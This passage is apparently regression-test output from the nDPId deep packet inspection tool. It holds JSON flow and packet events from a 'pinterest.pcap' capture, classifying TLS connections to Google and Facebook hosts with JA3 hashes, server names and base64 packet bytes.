broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,resources.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} -00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="} 